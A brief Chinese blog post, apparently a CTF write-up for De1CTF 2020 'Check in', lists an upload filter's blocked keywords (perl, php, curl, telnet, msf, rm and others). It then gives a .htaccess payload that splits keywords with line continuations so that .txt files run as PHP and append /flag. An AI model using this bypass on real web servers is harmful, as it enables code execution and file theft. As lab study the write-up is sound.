de1ctf 2020 Check in

 

 

过滤

perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents!

 

换行绕过文本检测

上传.htaccess文件(htaccess文件支持多行)

AddHandler p\

hp5-script .txt

p\

hp_value au\

to_append_file /flag

 

 

再上传一个txt文件就能加载/flag内容

得到flag

 

posted @ 2020-05-06 22:08  zhangzhijie98  阅读(430)  评论(0编辑  收藏  举报